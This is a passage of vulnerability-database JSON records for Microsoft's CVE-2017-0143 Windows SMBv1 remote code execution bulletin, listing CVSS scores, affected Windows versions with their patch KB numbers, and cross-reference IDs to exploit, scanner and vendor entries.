"KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T18:46:16", "differentElements": ["msAffectedSoftware"], "edition": 13}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-05T20:48:26", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-05T20:48:26", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-05T20:48:26", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013198", "KB4013429", "KB3210720", "KB4012215", "KB3213986", "KB4012217", "KB4012598", "KB3205409", "KB3177186", "KB4012606", "KB4012214", "KB4012212", "KB3210721", "KB4012216", "KB3205401", "KB3212646", "KB4012213", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T20:48:26", "differentElements": ["msAffectedSoftware"], "edition": 14}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-06T10:43:29", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-06T10:43:29", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-06T10:43:29", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012606", "KB4012598", "KB4012215", "KB4012217", "KB3213986", "KB3205401", "KB3177186", "KB3205409", "KB4012213", "KBMS16-110, 3187754", "KB4012216", "KB4013198", "KB4012212", "KB3210720", "KB4012214", "KB3212646", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-06T10:43:29", "differentElements": ["msAffectedSoftware"], "edition": 15}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", 